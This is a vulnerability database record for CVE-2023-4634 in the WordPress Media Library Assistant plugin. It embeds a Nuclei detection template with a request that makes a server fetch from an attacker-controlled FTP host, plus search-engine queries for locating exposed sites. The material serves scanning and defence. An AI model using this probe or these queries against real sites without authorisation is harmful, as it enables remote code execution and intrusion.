{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2023-4634/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2023-4634/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2023-4634/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2023-4634/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2023-4634/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2023-4634"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2023-4634"
    }
  },
  "enrichments": {
    "nuclei": {
      "nuclei": true,
      "nuclei_template": "http/cves/2023/CVE-2023-4634.yaml",
      "nuclei_template_severity": "critical",
      "nuclei_template_yaml": "id: CVE-2023-4634\n\ninfo:\n  name: Media Library Assistant < 3.09 - Remote Code Execution/Local File Inclusion\n  author: Pepitoh,ritikchaddha\n  severity: critical\n  description: |\n    A vulnerability in the Wordpress Media-Library-Assistant plugins in version < 3.09 is vulnerable to a local file inclusion which leading to RCE on default Imagegick installation/configuration.\n  impact: |\n    Successful exploitation of this vulnerability could lead to remote code execution or unauthorized access to local files.\n  remediation: Fixed in version 3.09\n  reference:\n    - https://patrowl.io/blog-wordpress-media-library-rce-cve-2023-4634/\n    - https://fr.wordpress.org/plugins/media-library-assistant/advanced/\n    - https://cve.report/CVE-2023-4634\n    - https://packetstormsecurity.com/files/174508/wpmla309-lfiexec.tgz\n    - https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=2955933%40media-library-assistant&new=2955933%40media-library-assistant&sfp_email=&sfph_mail=#file4\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2023-4634\n    cwe-id: CWE-73\n    epss-score: 0.8589\n    epss-percentile: 0.99723\n    cpe: cpe:2.3:a:davidlingren:media_library_assistant:*:*:*:*:*:wordpress:*:*\n  metadata:\n    verified: true\n    max-request: 2\n    vendor: davidlingren\n    product: media_library_assistant\n    framework: wordpress\n    shodan-query: http.html:wp-content/plugins/media-library-assistant\n    fofa-query: body=wp-content/plugins/media-library-assistant\n    publicwww-query: \"wp-content/plugins/media-library-assistant\"\n  tags: cve,cve2023,packetstorm,wordpress,wp,wp-plugin,lfi,rce,media-library-assistant,davidlingren,vkev,vuln\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/wp-content/plugins/media-library-assistant/readme.txt\"\n      - \"{{BaseURL}}/wp-content/plugins/media-library-assistant/includes/mla-stream-image.php?mla_stream_file=ftp://{{interactsh-url}}/patrowl.svg\"\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body_1\n        words:\n          - \"Media Library Assistant\"\n\n      - type: word\n        part: interactsh_protocol\n        words:\n          - \"dns\"\n# digest: 4a0a00473045022100b7ffffcd909cbdc779f07cc84518ac02fdda007d6a551dd38dc843f27d3cf54a02201f546db11fad7de216013638dc3a58686f9d6204d28224961deb4f5a0c33bba0:922c64590222798bb761d5b6d8e72950"
    }
  },
  "vuln_id": "cve-2023-4634"
}